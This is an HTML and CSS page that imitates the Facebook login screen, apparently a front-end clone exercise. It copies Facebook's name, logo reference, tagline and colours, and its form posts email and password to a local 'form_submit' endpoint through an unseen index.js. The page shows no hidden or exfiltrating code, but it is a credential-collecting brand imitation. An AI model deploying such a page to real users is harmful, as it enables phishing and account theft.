<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Facebook</title>
    <link rel="icon" href="./favicon.ico" type="image/x-icon">
  </head>
  <style>
    *{
      margin: 0;
      padding: 0;
    }
    .outer_container {
      width: 100%;
      height: 600px;
      display: flex;
      align-items: center;
      justify-content: center;
      background-color: #f0f2f5;
    }
    .inner_container {
      width: 75%;
      height: 400px;
      display: flex;
      justify-content: space-between;
    }
    .left_container {
      display: flex;
      flex-direction: column;
      font-family: system-ui, -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;
      font-size: 30px;
      justify-content: center;
      padding-left: 0;
    }
    .left_container img {
      width: 250px;
    }
    .left_container p {
      padding-left: 30px;
    }
    .right_container {
      text-align: center;
      display: flex;
      flex-direction: column;
      justify-content: center;
    }
    .right_container form {
      display: flex;
      flex-direction: column;
      justify-content: center;
      align-items: center;
      text-align: center;
      padding: 10px;
      background-color: #fff;
      border-radius: 6px;
    }
    .right_container form input {
      font-size: 1rem;
      height: 40px;
      border-radius: 10px;
      margin: 6px 0;
      border: 2px solid #f0f2f5;
      width: 100%;
    }
    #forgot_pswd {
      text-decoration: none;
      color :#1877f2;
      padding: 8px 0px;
      font-family: system-ui, -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;
    }
    #login_btn {
      border-radius: 6px;
      color: white;
      background-color: #1877f2;
      font-weight: bolder;
      width: 100%;
      cursor: pointer;
    } 
    hr {
      margin: 12px;
      width: 100%;
      border-top: 2px solid #f0f2f5;
    }
    #account_create {
      border-radius: 6px;
      color: white;
      background-color: #42b72a;
      font-weight: bolder;
      font-size: 15px;
      margin: 5px;
      font-family: system-ui, -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;
      border: none;
      padding: 13px;
      width: 200px;
      cursor: pointer;
    }
    #para {
      padding: 15px;
      font-family: system-ui, -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;
    }

  </style>
  <body>
        <div class="outer_container">
          <div class="inner_container">
            <div class="left_container">
              <img src="fb.png" alt="">
              <p>Facebook helps you connect and share <br/>with the people in your life.</p>
            </div>
            <div class="right_container">
              <form method="post" action="form_submit" >
                <input type="email" name="email" id="user_mail" placeholder="   Email address or phone number" />
                <input type="password" name="password" id="user_pswd" placeholder="   Password" />
                <input type="submit" id="login_btn" value="Login" />
                <a href="#" id="forgot_pswd" >Forgotten Password</a><hr>
                <button id="account_create" >Create New Account</button>
              </form>
              <p id="para" ><b>Create a Page</b> for a celebrity, brand or business.</p>
            </div>
          </div>
        </div>
	<script src="index.js"></script>
  </body>
</html>